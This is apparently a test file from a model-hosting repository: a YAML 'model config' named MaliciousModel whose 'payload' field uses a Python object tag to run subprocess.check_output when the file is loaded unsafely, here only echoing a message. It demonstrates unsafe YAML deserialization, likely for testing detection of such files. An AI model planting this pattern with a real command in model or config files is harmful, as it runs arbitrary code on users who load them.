testmodel / model_1010.yaml
dltest123456's picture
test
7ad9444 verified
model:
name: MaliciousModel
layers: 3
activation: relu
payload: !!python/object/apply:subprocess.check_output
args: [["echo", "Malicious YAML model executed!"]]
kwds: {shell: false}